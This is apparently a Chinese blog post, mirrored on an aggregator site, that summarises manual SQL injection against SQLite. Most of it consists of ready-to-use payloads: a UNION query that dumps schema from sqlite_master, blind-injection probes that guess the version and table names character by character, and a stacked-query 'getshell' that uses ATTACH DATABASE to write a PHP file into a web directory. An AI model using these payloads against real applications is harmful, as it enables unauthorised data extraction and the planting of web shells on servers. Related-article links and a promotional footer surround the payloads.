zoukankan      html  css  js  c++  java
  • SQLite手工注入方法小结

    SQLite 官网下载:www.sqlite.org/download.html

    sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index

    sqlite_master隐藏表,具体内容如下:

    字段:type/name/tbl_name/rootpage/sql

     sqlite注入测试:

     1、Union select 查询

    select * from test where id =1 and 1=2 union select name,sql from sqlite_master

     

    2、盲注

    select * from test where id =1 union select 1,length(sqlite_version())=6    //得到sqlite版本位数

    select * from test where id =1 and substr(sqlite_version(),1,1)='3'            //得到sqlite版本首位为3

    select * from test where id =1 and substr((select name from sqlite_master where type='table' limit 0,1),1,1)='T'  (大小写区分,有差别)  //得到sqlite表名第一位为T

     3、Getshell

    select * from test where id =1 ;ATTACH DATABASE 'C:\Sqlite\xiaozi.php' AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (' <?php phpinfo(); ?> '); --

    最后

    欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。 

     

    参考链接:

    Win7下SQLite安装配置与使用方法详解:http://www.codeceo.com/article/win7-sqlite-usage.html

    Windows下安装配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

  • 相关阅读:
    代理模式第一篇
    命令模式第二篇
    windows service 定时
    postman之asp.net webapi
    qq第三方登录
    core2.1下的identity 汉化
    asp.net core2.0里的Nlog
    Unable to create an object of type 'ApplicationDbContext'.
    identity使用mysql
    二进制位运算解决状态值
  • 原文地址:https://www.cnblogs.com/xiaozi/p/5760321.html
Copyright © 2011-2022 走看看